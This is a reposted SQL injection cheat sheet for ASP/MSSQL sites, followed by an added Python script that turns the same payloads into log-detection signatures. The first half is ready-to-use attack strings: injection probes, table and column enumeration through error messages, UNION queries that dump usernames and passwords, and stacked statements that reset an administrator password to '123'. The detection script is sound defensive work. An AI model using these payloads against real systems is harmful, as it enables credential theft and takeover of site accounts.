• Common SQL injection statements


    Test whether an injection point exists
    ; and 1=1 and 1=2
    Guess table names; common table names are usually admin, adminuser, user, pass, password, etc.
    and 0<>(select count(*) from *)
    and 0<>(select count(*) from admin) ---checks whether the admin table exists
    Get the database version
    and (select @@version)>0
    Get the current database name
    and db_name()>0
    Get the current database user name
    and user>0
    and user_name()='dbo'
    Guess all database names
    and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0
    Guess a table's column names
    and (Select Top 1 col_name(object_id('表名'),1) from sysobjects)>0
    and (select top 1 asernaose from admin where id =1)>1
    .asp?id=xx having 1=1  here admin.id in the error message gives the table name admin and the column name id
    .asp?id=xx group by admin.id having 1=1 reveals the next column name
    .asp?id=xx group by admin.id,admin.username having 1=1 reveals another column name; the page must be tied to the table
    Once the table name and column names are known, the exact values can be dumped
    union select 1,2,username,password,5,6,7,8,9,10,11,12 from usertable where id=6
    Dump account names
    union select min(username),1,1,1,.. from users where username > 'a'
    Loop the same way to dump the remaining accounts
    union select min(username),1,1,1,.. from users where username > 'admin'
    ;begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from userstable where username>@ret select @ret as ret into foo end
    Change the administrator password to 123
    .asp?id=××;update admin set password='123' where id =1
    .asp?id=××;insert into admin(asd,..) values(123,..) –this writes 123 into admin
    robots.txt
    Guess the name of the user table in the database
    and (select count(*) from 数据库.dbo.表名)>0
    If the table name exists the page works normally, otherwise it errors
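As an added example that is not part of the original post, the following Python script turns the payload families listed above (boolean probes, count/catalog probes, HAVING/GROUP BY column enumeration, UNION dumps, stacked UPDATE/INSERT statements) into detection signatures and runs them over a few constructed access-log lines; the log format, IP addresses and paths are assumptions, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload families on this page (MSSQL-style
# error-based probes, HAVING enumeration, UNION dumps, stacked statements).
SIGNATURES = {
    "boolean_probe":  re.compile(r"\band\s+\d+\s*=\s*\d+\b", re.I),
    "count_probe":    re.compile(r"\bselect\s+count\s*\(\s*\*\s*\)\s+from\b", re.I),
    "version_probe":  re.compile(r"@@version|\bdb_name\s*\(\)|\buser_name\s*\(\)", re.I),
    "having_enum":    re.compile(r"\bhaving\s+\d+\s*=\s*\d+\b", re.I),
    "union_dump":     re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "stacked_write":  re.compile(r";\s*(update|insert|declare|begin)\b", re.I),
    "system_catalog": re.compile(r"\bsysobjects\b|\bsysdatabases\b", re.I),
}

def classify_request(path: str) -> list:
    """Return the signature names matching a URL-decoded request path+query."""
    decoded = unquote_plus(path)  # decode %20 / + before matching
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

# Constructed sample access-log lines (hypothetical hosts and paths).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5123
10.0.0.7 - - [10/Oct/2023:13:55:40 +0000] "GET /news.asp?id=12%20and%201=2 HTTP/1.1" 200 312
10.0.0.7 - - [10/Oct/2023:13:55:41 +0000] "GET /news.asp?id=12%20having%201=1 HTTP/1.1" 500 877
10.0.0.7 - - [10/Oct/2023:13:55:45 +0000] "GET /news.asp?id=12%20union%20select%201,2,username,password%20from%20admin HTTP/1.1" 200 2048
10.0.0.7 - - [10/Oct/2023:13:55:50 +0000] "GET /news.asp?id=12;update%20admin%20set%20password='123' HTTP/1.1" 200 5123
"""

# Common-log-format parser: client IP, method, path, HTTP status.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def scan_log(text: str) -> list:
    """Parse each log line and report those that match at least one signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        tags = classify_request(m["path"])
        if tags:
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "path": m["path"], "tags": tags})
    return hits

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["ip"], h["status"], h["tags"], h["path"])
```

A 500 status paired with the having_enum tag is the error-based enumeration this page describes, so that combination is worth alerting on separately from the 200s.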
  • Original article: https://www.cnblogs.com/wepe/p/7424647.html
Copyright © 2020-2023  润新知